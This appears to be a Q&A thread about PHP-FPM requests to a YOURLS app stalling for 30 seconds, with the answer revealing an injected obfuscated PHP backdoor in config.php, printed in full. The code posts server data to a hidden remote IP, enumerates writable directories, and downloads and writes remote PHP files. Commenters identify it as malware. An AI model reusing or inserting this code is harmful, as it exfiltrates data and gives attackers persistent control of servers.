# PHP: http requests getting stuck in fpm pool for 30 seconds before getting processed

Tags: php, fpm, yourls

I have an Ubuntu server with nginx and several apps running on php7.3

There is only ONE php app, Yourls https://yourls.org/ (latest version), whose http requests are getting stuck in the fpm pool for 30 seconds before returning a response.

After turning on debug-level logging, I can see that the below line repeats for 30 seconds:

```
[07-Apr-2020 18:37:01] DEBUG: pid 4643, fpm_pctl_perform_idle_server_maintenance(), line 378: [pool glblme] currently 1 active children, 2 spare children, 3 running children. Spawning rate 1
```

Before it finally returns a response:

```
[07-Apr-2020 18:37:32] DEBUG: pid 4643, fpm_pctl_perform_idle_server_maintenance(), line 378: [pool globalme] currently 0 active children, 2 spare children, 2 running children. Spawning rate 1
```

Adding some logs to Yourls php files shows that the request is indeed arriving 30 seconds after the request is made.

Why? And why only this app when other apps on the same php fpm are responding instantaneously?

Comment: I've used Yourls before and I couldn't reproduce this behavior. It's probably something with your configuration. Have you tried to setup a VM with the default configs running only this script to see if the problem persists?

Comment: @EnricoDias I haven't tried setting up a separate machine, but I'll do that and see what happens.

Answer (score 0):

I found the problem. My config.php, for some reason, had accumulated a pile of gibberish at the first line:

```
<?php if(!isset($incode)){$vl='s';$serverid='noidjxzge';$server_addr='111.126.85.190';function ooOOo($ooO0o,$ooo0,$oo000,$ooo0O,$oo,$o00o){$oO='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0';if(ini_get('allow_url_fopen')==1){$oOo=stream_context_create(array($o00o=>array('method'=>'POST','timeout'=>$oo,'header'=>array('Content-type: application/x-www-form-urlencoded','User-Agent: '.$oO,'content'=>http_build_query($_SERVER)))));if($ooo0O=='yes'){$ooO0o=$ooO0o.'&type=fopen';}$o0=@file_get_contents($ooO0o,false,$oOo);}elseif(in_array('curl',get_loaded_extensions())){if($ooo0O=='yes'){$ooO0o=$ooO0o.'&type=curl';}$oooO=curl_init();curl_setopt($oooO,CURLOPT_URL,$ooO0o);curl_setopt($oooO,CURLOPT_HEADER,false);curl_setopt($oooO,CURLOPT_RETURNTRANSFER,true);curl_setopt($oooO,CURLOPT_TIMEOUT,$oo);curl_setopt($oooO,CURLOPT_USERAGENT,$oO);if($o00o=='https'){curl_setopt($oooO,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($oooO,CURLOPT_SSL_VERIFYHOST,false);}curl_setopt($oooO,CURLOPT_CONNECTTIMEOUT,5);curl_setopt($oooO,CURLOPT_POSTFIELDS,http_build_query($_SERVER));$o0=@curl_exec($oooO);curl_close($oooO);}else{if($ooo0O=='yes'){$oo000=$oo000.'&type=socks';}if($o00o=='https'){$o00=fsockopen('ssl://'.$ooo0,443,$oOoOO,$oOOO,$oo);}else{$o00=fsockopen($ooo0,80,$oOoOO,$oOOO,$oo);}if($o00){stream_set_timeout($o00,$oo);$oO0=http_build_query($_SERVER);$oO000='POST '.$oo000.' HTTP/1.0'."\r\n";$oO000.='Host: '.$ooo0."\r\n";$oO000.='User-Agent: '.$oO."\r\n";$oO000.='Content-Type: application/x-www-form-urlencoded'."\r\n";$oO000.='Content-Length: '.strlen($oO0)."\r\n\r\n";fwrite($o00,$oO000);fwrite($o00,$oO0);$o0Oo0='';while(!feof($o00)){$o0Oo0.=fgets($o00,4096);}fclose($o00);list($o0o,$oO00)=@preg_split("/\R\R/",$o0Oo0,2);$o0=$oO00;}}return$o0;}function c_version($oOO){$o0O0[0]=(int)($oOO/256/256/256);$o0O0[1]=(int)(($oOO-$o0O0[0]*256*256*256)/256/256);$o0O0[2]=(int)(($oOO-$o0O0[0]*256*256*256-$o0O0[1]*256*256)/256);$o0O0[3]=$oOO-$o0O0[0]*256*256*256-$o0O0[1]*256*256-$o0O0[2]*256;return''.$o0O0[0].".".$o0O0[1].".".$o0O0[2].".".$o0O0[3];}function ooo($o0O0o){$o0O00=array();$o0O00[]=$o0O0o;foreach(scandir($o0O0o) as$oo0oo){if($oo0oo=='.'||$oo0oo=='..'){continue;}$o0O=$o0O0o.DIRECTORY_SEPARATOR.$oo0oo;if(is_dir($o0O)){$o0O00[]=$o0O;$o0O00=array_merge($o0O00,ooo($o0O));}}return$o0O00;}$oo0oO=@preg_replace('/^www\./','',$_SERVER['HTTP_HOST']);$ooo0=c_version('1540531608');$oo000='/get.php?spider&checkdomain&host='.$oo0oO.'&serverid='.$serverid.'&stookfile='.__FILE__;$ooO0o='http://'.$ooo0.'/get.php?spider&checkdomain&host='.$oo0oO.'&serverid='.$serverid.'&stookfile='.__FILE__;$ooO00=ooOOo($ooO0o,$ooo0,$oo000,$ooo0O='no',$oo='30',$o00o='http');if($ooO00!='havedoor|havedonor'){$oOOoo=$_SERVER['HTTP_HOST'];$ooO=@preg_replace('/^www\./','',$_SERVER['HTTP_HOST']);$ooo=$_SERVER['DOCUMENT_ROOT'];chdir($ooo);$o0O00=ooo($ooo);$o0O00=array_unique($o0O00);foreach($o0O00 as$oo0oo){if(is_dir($oo0oo)&&is_writable($oo0oo)){$o00OO=explode(DIRECTORY_SEPARATOR,$oo0oo);$oOOo=count($o00OO);$ooOO[]=$oOOo.'|'.$oo0oo;}}$oOOo=0;foreach($ooOO as$oOO0){if(count($ooOO)>1&&(strstr($oOO0,'/wp-admin')||strstr($oOO0,'/cgi-bin'))){unset($ooOO[$oOOo]);}$oOOo++;}if(!is_writable($ooo)){natsort($ooOO);$ooOO=array_values($ooOO);$oOO0=explode('|',$ooOO[0]);$oOO0=$oOO0[1];}else{$oOO0=$ooo;}chdir($oOO0);if(stristr($ooO00,'nodoor')){$ooO0o='http://'.$ooo0.'/get.php?vl='.$vl.'&update&needfilename';$oo000='/get.php?vl='.$vl.'&update&needfilename';$oooOo=ooOOo($ooO0o,$ooo0,$oo000,$ooo0O='no',$oo='55',$o00o='http');$o0000=explode('|||||',$oooOo);$oooo=$o0000[0].'.php';$oOoOo=$o0000[1];file_put_contents($oOO0.DIRECTORY_SEPARATOR.$oooo,$oOoOo);$o0OO0=str_replace($ooo,'',$oOO0);if($_SERVER['SERVER_PORT']=='443'){$o00o='https';}else{$o00o='http';}$ooO0o=$o00o.'://'.$oOOoo.$o0OO0.'/'.$oooo.'?gen&serverid='.$serverid;$oo000=$o0OO0.'/'.$oooo.'?gen&serverid='.$serverid;$o00Oo=ooOOo($ooO0o,$oOOoo,$oo000,$ooo0O='no',$oo='55',$o00o);}elseif(stristr($ooO00,'needtoloadsomefiles')){shuffle($ooOO);$oOO0=explode('|',$ooOO[0]);$oOO0=$oOO0[1];$o0OO0=str_replace($ooo,'',$oOO0);$o0OO='stuvwxyz';$oooo=str_shuffle($o0OO).'.php';$o0OoO=urlencode($o00o.'://'.$oOOoo.$o0OO0.'/'.$oooo);$ooO0o='http://'.$ooo0.'/get.php?bdr&url='.$o0OoO;$oo000='/get.php?bdr&url='.$o0OoO;$o0=ooOOo($ooO0o,$ooo0,$oo000,$ooo0O='no',$oo='20',$o00o='http');file_put_contents($oOO0.DIRECTORY_SEPARATOR.$oooo,$o0);}elseif(stristr($ooO00,'needtoloadclient')){$ooO0o='http://'.$ooo0.'/get.php?getclient&domain='.$ooO;$oo000='/get.php?getclient&domain='.$ooO;$o0=ooOOo($ooO0o,$ooo0,$oo000,$ooo0O='no',$oo='55',$o00o='http');if($o0=='noclient'){exit;}$oo0Oo=explode('::::',$o0);$oOo0O=$oo0Oo[0];$oooo0=$oo0Oo[1];@chmod($oOo0O,0666);file_put_contents($oOo0O,$oooo0);}elseif($ooO00=='needtowait'){}if(stristr($ooO00,'nodonor')){}}$incode=1;}?>
```

After removing this code, the app worked like a charm!

Comment: It looks like someone injected a malicious code in your file. There are probably a security vulnerability somewhere and if you don't fix it, this problem will probably happen again.

Comment: Seconding @EnricoDias. If that code got into your `config.php` file without you putting it there, that's a symptom of something much bigger that needs fixing.

Comment: You got infected with a [fine backdoor](https://gist.github.com/ozh/d5407c5f487fa39b1e634d8f58db0e40). Thing is, it scans every dir and files and chmod them to be writable,so you probably have a gazillion files infected as well.

Comment: Thanks for the heads-up @Ozh ! I've replaced the whole Yourls app with a newer version and removed the older web directory. Unless you're suggesting that the backdoor script can chmod ALL files on the server, including files outside the web app directory?

Comment: A file in a web app directory is just a file, its directory is not a barrier. Yes it can change files anywhere.